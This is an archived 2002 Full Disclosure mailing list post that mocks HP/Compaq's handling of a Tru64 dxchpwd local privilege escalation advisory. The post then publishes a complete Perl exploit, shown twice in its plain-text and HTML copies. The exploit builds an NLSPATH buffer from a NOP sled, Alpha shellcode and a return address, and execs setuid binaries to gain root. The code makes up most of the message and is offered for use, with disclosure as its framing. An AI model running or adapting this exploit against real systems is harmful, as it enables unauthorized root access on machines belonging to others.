Full Disclosure mailing list archives
In regards to ... http://online.securityfocus.com/bid/5382
From: full-disclosure () lists netsys com (KF)
Date: Mon, 5 Aug 2002 12:22:18 -0700
This is a multi-part message in MIME format. ------=_NextPart_000_001C_01C23C7A.BD97E400 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable In regards to ... http://online.securityfocus.com/bid/5382 and=20 http://ftp.support.compaq.com/patches/public/Readmes/unix/t64v51b19-c0136= 900-14951-es-20020730.README - SSRT2262 /usr/tcb/bin/dxchpwd (Severity - Medium) why medium? Because = the public had not seen an exploit? This ECO has not been through an exhaustive field test process. Due to the experimental stage of this ECO/workaround, Hewlett-Packard makes no representations regarding its use or performance. The customer shall have the sole responsibility for adequate protection and back-up data used in conjunction with this ECO/workaround. ^--- hrmm cute.=20 I think I can make one of those right quick too.=20 This SNOSoft Proof of Concept Tool has not been through an exhaustive=20 field test process. Due to the experimental stage of this Tool, SNOSoft makes no representations regarding its use or performance. The customer of Compaq / HP shall have the sole responsibility for adequate = protection and back-up data used in conjunction with his or her own system and the = use of the following SNO/Proof of Concept Tool. Official SNO workaround is: See vendor or if paranoid chmod -s everything in sight.=20 This is supposed to be the vendor fix... I have not tested it. I assume = with the coordination from CERT and the concious decision to release a public = patch=20 that the vendor has provided a good workaround. http://ftp.support.compaq.com/patches/public/Readmes/unix/t64v51b19-c0136= 900-14951-es-20020730.README Please note after all the public drama with HP look whos name ends up in = the credit section. *grin*=20 Good find guys... lets give the HP dev staff a round of applause. = *sarcasm* Tru64 DXCHPWD Local Privilege Escalation Vulnerability Credit: Published in a Compaq security advisory.=20 Hrmm how nice of them to mention us. I will give someone a cookie if they can tell me when NLSPATH was first = a big issue on OTHER unix systems.=20 I hope this isn't broken... if it is don't whine to me ... fix it.=20 --- begin copyrighted material #!/usr/bin/perl -w # # stripey (stripey () snosoft com)=20 # # This code is copyrighted by Snosoft # http://www.snosoft.com # If you are a direct employee of HP or Compaq # you are not aloud to look at this program or use it.=20 # in order to protect our copyright on this=20 # program we have crippled it (at least) by adding=20 # _IWORKATHP to some part of the code.If=20 # you do not work for HP or Compaq you may=20 # remove these letters at will provided this copyright notice # remains attached to the header of this code. .=20 # As stated above if you work at hp you should=20 # not even be reading at this point. However if=20 # you are please note that by removing the letters # _IWORKATHP from this document you are violating=20 # the DMCA section 1201(a)=20 # Also Please note that most of the targets in=20 # this are removed pending CERT releases.=20 $tgts{"0"} =3D pack("l",0x40010c04).":/usr/dt/bin/SORRY"; $tgts{"1"} =3D pack("l",0x400a7908).":/usr/bin/X11/CANTTELLYA"; $tgts{"2"} =3D pack("l",0x40014280).":/usr/sbin/HRMMM"; $tgts{"3"} =3D pack("l",0x4003c190).":/usr/bin/LALALALAL"; $tgts{"4"} =3D pack("l",0x400361f0).":/usr/bin/HARHAR"; $tgts{"5"} =3D pack("l",0x4009f2f8).":/usr/tcb/bin/dxchpwd"; $tgts{"6"} =3D pack("l",0x400120b0).":/usr/bin/OOPS"; $tgts{"7"} =3D pack("l",0x400105e8).":/usr/bin/DECLANR0X"; unless (($target,$offset,$align) =3D @ARGV,$align) { =20 print "\nUsage: $0 <target> <offset> <align>\n\nTargets:\n\n"; foreach $key (sort(keys %tgts)) { ($a,$b) =3D split(/\:/,$tgts{"$key"}); print "\t$key. $b\n"; } print "\n"; exit 1; } ($a,$b) =3D split(/\:/,$tgts{"$target"}); print "*** Target: $b, Offset: $offset, Align: $align ***\n\n"; $ret =3D pack("ll",(unpack("l",$a)+$offset), 0x1); # GOBBLES someday I will switch gears in the sweat shop and=20 # get that shellcode wrote uo. That was quite the entertaining=20 # talk or speach or whatever this weekend.=20 # shellcode by Taeho Oh=20 $sc .=3D "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42"; $sc .=3D "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2"; $sc .=3D "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2"; $sc .=3D "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43"; $sc .=3D "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43"; $sc .=3D "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6"; $sc .=3D "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22"; $sc .=3D "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26"; $sc .=3D "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43"; $sc .=3D "\x20\x35\x60\x42\xff\xff\xff\xff"; $tlen =3D (1024-(length($sc)))/4; $buf .=3D "B"x$align; $buf .=3D pack("l",0x47ff041f)x($tlen-1); $buf .=3D $sc; $buf .=3D $ret; $ENV{"NLSPATH"} =3D $buf; if ($target =3D=3D 7) { print "Hit ctrl-d...\n"; } if ($target =3D=3D 6) { exec("$b","-d","a=3Dasdf","-c","_IWORKATHP/tmp/","\'\$\{a\}\'"); } else { exec("$b"); } ---- end copyrighted material -KF ------=_NextPart_000_001C_01C23C7A.BD97E400 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META http-equiv=3DContent-Type content=3D"text/html; = charset=3Diso-8859-1"> <META content=3D"MSHTML 5.50.4916.2300" name=3DGENERATOR> <STYLE></STYLE> </HEAD> <BODY bgColor=3D#ffffff> <DIV><FONT face=3DArial size=3D2>In regards to ... <A=20 href=3D"http://online.securityfocus.com/bid/5382">http://online.securityf= ocus.com/bid/5382</A> and=20 </FONT></DIV> <DIV><FONT face=3DArial size=3D2><A=20 href=3D"http://ftp.support.compaq.com/patches/public/Readmes/unix/t64v51b= 19-c0136900-14951-es-20020730.README">http://ftp.support.compaq.com/patch= es/public/Readmes/unix/t64v51b19-c0136900-14951-es-20020730.README</A></F= ONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV>- SSRT2262 /usr/tcb/bin/dxchpwd (Severity - Medium) why = medium?=20 Because the public had not seen an exploit?</DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV>This ECO has not been through an exhaustive field test = process.<BR>Due to=20 the experimental stage of this ECO/workaround, Hewlett-Packard<BR>makes = no=20 representations regarding its use or performance. The<BR>customer shall = have the=20 sole responsibility for adequate protection<BR>and back-up data used in=20 conjunction with this ECO/workaround.</DIV> <DIV><FONT face=3DArial size=3D2>^--- hrmm cute. </FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2>I think I can make one of those right = quick too.=20 </FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2> <DIV>This SNOSoft Proof of Concept Tool has not been = through an=20 exhaustive </DIV> <DIV>field test process. Due to the experimental stage of = this Tool,=20 SNOSoft<BR>makes no representations regarding its use or performance.=20 The<BR>customer of Compaq / HP shall have the sole responsibility for = adequate=20 protection<BR>and back-up data used in conjunction with his or her = own=20 system and the use of the</DIV> <DIV>following SNO/Proof of Concept Tool.</DIV> <DIV></FONT><FONT face=3DArial size=3D2></FONT> </DIV></DIV> <DIV><FONT face=3DArial size=3D2>Official SNO workaround = is:</FONT></DIV> <DIV><FONT face=3DArial size=3D2>See vendor or if paranoid chmod -s = everything in=20 sight. </FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2>This is supposed to be the vendor = fix... I have not=20 tested it. I assume with the</FONT></DIV> <DIV><FONT face=3DArial size=3D2>coordination from CERT and the = concious=20 decision to release a public patch </FONT></DIV> <DIV><FONT face=3DArial size=3D2>that the vendor has provided a good=20 workaround.</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2></FONT><FONT face=3DArial size=3D2><A=20 href=3D"http://ftp.support.compaq.com/patches/public/Readmes/unix/t64v51b= 19-c0136900-14951-es-20020730.README">http://ftp.support.compaq.com/patch= es/public/Readmes/unix/t64v51b19-c0136900-14951-es-20020730.README</A></F= ONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2>Please note after all the public = drama with HP=20 look whos name ends up in the credit section. *grin* </FONT></DIV> <DIV><FONT face=3DArial size=3D2>Good find guys... lets give the HP dev = staff a=20 round of applause. *sarcasm*</FONT></DIV> <DIV><SPAN class=3Dbodytext><FONT face=3DArial = size=3D2></FONT></SPAN> </DIV> <DIV><SPAN class=3Dbodytext><SPAN class=3Dmaintitle>Tru64 DXCHPWD Local = Privilege=20 Escalation Vulnerability</SPAN></SPAN></DIV> <DIV><SPAN class=3Dbodytext>Credit:<BR><SPAN = class=3Dtext> =20 Published in a Compaq security=20 advisory.</SPAN> </SPAN></DIV> <DIV><SPAN class=3Dbodytext><FONT face=3DArial = size=3D2></FONT></SPAN> </DIV> <DIV><SPAN class=3Dbodytext><FONT face=3DArial = size=3D2></FONT></SPAN> </DIV> <DIV><SPAN class=3Dbodytext><FONT face=3DArial size=3D2>Hrmm how nice of = them to=20 mention us.</FONT></SPAN></DIV> <DIV><SPAN class=3Dbodytext><FONT face=3DArial size=3D2>I will give = someone a cookie=20 if they can tell me when NLSPATH was first a big issue on OTHER unix = systems.=20 </FONT></SPAN></DIV> <DIV><SPAN class=3Dbodytext><FONT face=3DArial = size=3D2></FONT></SPAN> </DIV> <DIV><SPAN class=3Dbodytext><FONT face=3DArial size=3D2>I hope this = isn't broken... if=20 it is don't whine to me ... fix it. </FONT></SPAN></DIV> <DIV><SPAN class=3Dbodytext><FONT face=3DArial = size=3D2></FONT> </DIV></SPAN> <DIV><FONT face=3DArial size=3D2>--- begin copyrighted = material</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2>#!/usr/bin/perl -w<BR>#<BR># stripey = (<A=20 href=3D"mailto:stripey () snosoft com">stripey () snosoft com</A>) <BR>#<BR># = This code=20 is copyrighted by Snosoft<BR># <A=20 href=3D"http://www.snosoft.com">http://www.snosoft.com</A><BR># If you = are a=20 direct employee of HP or Compaq<BR># you are not aloud to look at this = program=20 or use it. <BR># in order to protect our copyright on this <BR># program = we have=20 crippled it (at least) by adding <BR># _IWORKATHP to some part of = the=20 code.If </FONT></DIV> <DIV><FONT face=3DArial size=3D2># you do not work for HP or Compaq you = may=20 </FONT></DIV> <DIV><FONT face=3DArial size=3D2># remove these letters at will provided = this=20 copyright notice</FONT></DIV> <DIV><FONT face=3DArial size=3D2># remains attached to the header of = this code. .=20 <BR># As stated above if you work at hp you should <BR># not even be = reading at=20 this point. However if <BR># you are please note that by removing the=20 letters<BR># _IWORKATHP from this document you are violating <BR># the = DMCA=20 section 1201(a) </FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2># Also Please note that most of the = targets in=20 <BR># this are removed pending CERT releases. </FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2>$tgts{"0"} =3D=20 pack("l",0x40010c04).":/usr/dt/bin/SORRY";<BR>$tgts{"1"} =3D=20 pack("l",0x400a7908).":/usr/bin/X11/CANTTELLYA";<BR>$tgts{"2"} =3D=20 pack("l",0x40014280).":/usr/sbin/HRMMM";<BR>$tgts{"3"} =3D=20 pack("l",0x4003c190).":/usr/bin/LALALALAL";<BR>$tgts{"4"} =3D=20 pack("l",0x400361f0).":/usr/bin/HARHAR";<BR>$tgts{"5"} =3D=20 pack("l",0x4009f2f8).":/usr/tcb/bin/dxchpwd";<BR>$tgts{"6"} =3D=20 pack("l",0x400120b0).":/usr/bin/OOPS";<BR>$tgts{"7"} =3D=20 pack("l",0x400105e8).":/usr/bin/DECLANR0X";</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2>unless (($target,$offset,$align) =3D = @ARGV,$align)=20 {<BR> =20 <BR> print "\nUsage: $0 = <target>=20 <offset> <align>\n\nTargets:\n\n";</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial = size=3D2> foreach=20 $key (sort(keys %tgts))=20 {<BR> &n= bsp; =20 ($a,$b) =3D=20 split(/\:/,$tgts{"$key"});<BR> &= nbsp; =20 print "\t$key. $b\n";<BR> =20 }</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial = size=3D2> print=20 "\n";</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial = size=3D2> exit=20 1;<BR>}</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2>($a,$b) =3D=20 split(/\:/,$tgts{"$target"});</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2>print "*** Target: $b, Offset: $offset, = Align:=20 $align ***\n\n";</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2>$ret =3D = pack("ll",(unpack("l",$a)+$offset),=20 0x1);</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2># GOBBLES someday I will switch gears = in the sweat=20 shop and <BR># get that shellcode wrote uo. That was quite the = entertaining=20 <BR># talk or speach or whatever this weekend. </FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2># shellcode by Taeho Oh </FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2>$sc .=3D=20 "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";<BR>$sc .=3D=20 "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";<BR>$sc .=3D=20 "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";<BR>$sc .=3D=20 "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";<BR>$sc .=3D=20 "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";<BR>$sc .=3D=20 "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";<BR>$sc .=3D=20 "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";<BR>$sc .=3D=20 "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26";<BR>$sc .=3D=20 "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";<BR>$sc .=3D=20 "\x20\x35\x60\x42\xff\xff\xff\xff";</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2>$tlen =3D = (1024-(length($sc)))/4;<BR>$buf .=3D=20 "B"x$align;<BR>$buf .=3D pack("l",0x47ff041f)x($tlen-1);<BR>$buf .=3D = $sc;<BR>$buf=20 .=3D $ret;</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2>$ENV{"NLSPATH"} =3D $buf;</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2>if ($target =3D=3D 7) { print "Hit = ctrl-d...\n";=20 }</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2>if ($target =3D=3D 6)=20 {<BR> =20 exec("$b","-d","a=3Dasdf","-c","_IWORKATHP/tmp/","\'\$\{a\}\'");<BR>} = else=20 {<BR> = exec("$b");<BR>}</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2>---- end copyrighted = material</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2>-KF</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV></BODY></HTML> ------=_NextPart_000_001C_01C23C7A.BD97E400--
Current thread:
- In regards to ... http://online.securityfocus.com/bid/5382 KF (Aug 05)